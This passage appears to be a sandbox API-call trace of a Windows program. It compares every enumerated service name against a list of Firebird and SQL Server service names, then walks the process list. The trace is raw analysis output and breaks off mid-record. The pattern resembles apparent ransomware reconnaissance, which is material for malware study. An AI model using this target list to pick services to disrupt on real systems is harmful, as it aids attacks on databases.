(lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0223.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0223.973] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0223.973] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0223.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0223.973] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0223.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0223.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0223.973] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0223.973] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0223.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0223.973] lstrlenW (lpString="CDPSvc") returned 6 [0223.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0223.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0223.973] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0223.973] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0223.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0223.973] lstrlenW (lpString="ClickToRunSvc") returned 13 [0223.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0223.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0223.973] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0223.973] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0223.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0223.974] lstrlenW (lpString="ClipSVC") returned 7 [0223.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClipSVC") returned 1 [0223.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClipSVC") returned 1 [0223.974] lstrcmpiW (lpString1="sqlwriter", lpString2="ClipSVC") returned 1 [0223.974] lstrcmpiW (lpString1="mssqlserver", lpString2="ClipSVC") returned 1 [0223.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClipSVC") returned 1 [0223.974] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0223.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0223.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0223.974] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0223.974] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0223.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0223.974] lstrlenW (lpString="CryptSvc") returned 8 [0223.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0223.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0223.974] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0223.974] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0223.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0223.974] lstrlenW (lpString="DcomLaunch") returned 10 [0223.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0223.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0223.974] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0223.974] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0223.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0223.974] lstrlenW (lpString="DeviceAssociationService") returned 24 [0223.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0223.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0223.974] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0223.974] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0223.974] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0223.974] lstrlenW (lpString="Dhcp") returned 4 [0223.974] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0223.974] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0223.974] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0223.975] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0223.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0223.975] lstrlenW (lpString="Dnscache") returned 8 [0223.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0223.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0223.975] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0223.975] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0223.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0223.975] lstrlenW (lpString="DoSvc") returned 5 [0223.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0223.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0223.975] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0223.975] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0223.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0223.975] lstrlenW (lpString="DPS") returned 3 [0223.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0223.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0223.975] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0223.975] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0223.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0223.975] lstrlenW (lpString="DusmSvc") returned 7 [0223.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0223.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0223.975] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0223.975] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0223.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0223.975] lstrlenW (lpString="EventLog") returned 8 [0223.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0223.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0223.975] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0223.975] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0223.975] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0223.975] lstrlenW (lpString="EventSystem") returned 11 [0223.975] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0223.975] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0223.975] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0223.976] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0223.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0223.976] lstrlenW (lpString="FontCache") returned 9 [0223.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0223.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0223.976] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0223.976] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0223.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0223.976] lstrlenW (lpString="gpsvc") returned 5 [0223.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0223.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0223.976] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0223.976] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0223.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0223.976] lstrlenW (lpString="iphlpsvc") returned 8 [0223.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0223.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0223.976] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0223.976] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0223.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0223.976] lstrlenW (lpString="KeyIso") returned 6 [0223.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0223.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0223.976] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0223.976] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0223.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0223.976] lstrlenW (lpString="LanmanServer") returned 12 [0223.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0223.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0223.976] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0223.976] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0223.976] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0223.976] lstrlenW (lpString="LanmanWorkstation") returned 17 [0223.976] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0223.976] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0223.976] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0223.977] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0223.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0223.977] lstrlenW (lpString="lfsvc") returned 5 [0223.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0223.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0223.977] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0223.977] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0223.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0223.977] lstrlenW (lpString="LicenseManager") returned 14 [0223.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0223.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0223.977] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0223.977] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0223.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0223.977] lstrlenW (lpString="lmhosts") returned 7 [0223.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0223.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0223.977] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0223.977] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0223.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0223.977] lstrlenW (lpString="LSM") returned 3 [0223.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0223.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0223.977] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0223.977] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0223.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0223.977] lstrlenW (lpString="MpsSvc") returned 6 [0223.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0223.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0223.977] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0223.977] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0223.977] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0223.977] lstrlenW (lpString="NcbService") returned 10 [0223.977] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0223.977] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0223.977] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0223.978] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0223.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0223.978] lstrlenW (lpString="netprofm") returned 8 [0223.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0223.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0223.978] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0223.978] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0223.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0223.978] lstrlenW (lpString="NlaSvc") returned 6 [0223.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0223.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0223.978] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0223.978] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0223.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0223.978] lstrlenW (lpString="nsi") returned 3 [0223.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0223.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0223.978] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0223.978] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0223.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0223.978] lstrlenW (lpString="PcaSvc") returned 6 [0223.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0223.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0223.978] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0223.978] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0223.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0223.978] lstrlenW (lpString="PlugPlay") returned 8 [0223.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0223.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0223.978] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0223.978] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0223.978] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0223.978] lstrlenW (lpString="Power") returned 5 [0223.978] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0223.978] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0223.979] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0223.979] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0223.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0223.979] lstrlenW (lpString="ProfSvc") returned 7 [0223.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0223.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0223.979] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0223.979] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0223.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0223.979] lstrlenW (lpString="RpcEptMapper") returned 12 [0223.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0223.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0223.979] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0223.979] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0223.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0223.979] lstrlenW (lpString="RpcSs") returned 5 [0223.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0223.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0223.979] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0223.979] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0223.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0223.979] lstrlenW (lpString="SamSs") returned 5 [0223.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0223.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0223.979] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0223.979] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0223.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0223.979] lstrlenW (lpString="Schedule") returned 8 [0223.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0223.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0223.979] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0223.979] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0223.979] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0223.979] lstrlenW (lpString="SecurityHealthService") returned 21 [0223.979] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0223.979] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0223.980] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0223.980] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0223.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0223.980] lstrlenW (lpString="SENS") returned 4 [0223.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0223.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0223.980] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0223.980] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0223.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0223.980] lstrlenW (lpString="ShellHWDetection") returned 16 [0223.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0223.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0223.980] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0223.980] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0223.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0223.980] lstrlenW (lpString="Spooler") returned 7 [0223.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0223.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0223.980] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0223.980] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0223.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0223.980] lstrlenW (lpString="sppsvc") returned 6 [0223.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0223.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0223.980] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0223.980] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0223.980] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0223.980] lstrlenW (lpString="SSDPSRV") returned 7 [0223.980] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0223.980] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0223.980] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0223.980] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0223.980] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x45c [0223.984] Process32FirstW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.985] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0223.986] lstrlenW (lpString="System") returned 6 [0223.986] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0223.987] lstrlenW (lpString="smss.exe") returned 8 [0223.987] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.987] lstrlenW (lpString="csrss.exe") returned 9 [0223.987] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0223.988] lstrlenW (lpString="wininit.exe") returned 11 [0223.988] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0223.989] lstrlenW (lpString="csrss.exe") returned 9 [0223.989] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0223.990] lstrlenW (lpString="winlogon.exe") returned 12 [0223.990] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0223.990] lstrlenW (lpString="services.exe") returned 12 [0223.990] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0223.991] lstrlenW (lpString="lsass.exe") returned 9 [0223.991] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.992] lstrlenW (lpString="svchost.exe") returned 11 [0223.992] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0223.993] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0223.993] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0223.993] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0223.993] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.994] lstrlenW (lpString="svchost.exe") returned 11 [0223.994] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.995] lstrlenW (lpString="dwm.exe") returned 7 [0223.995] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, 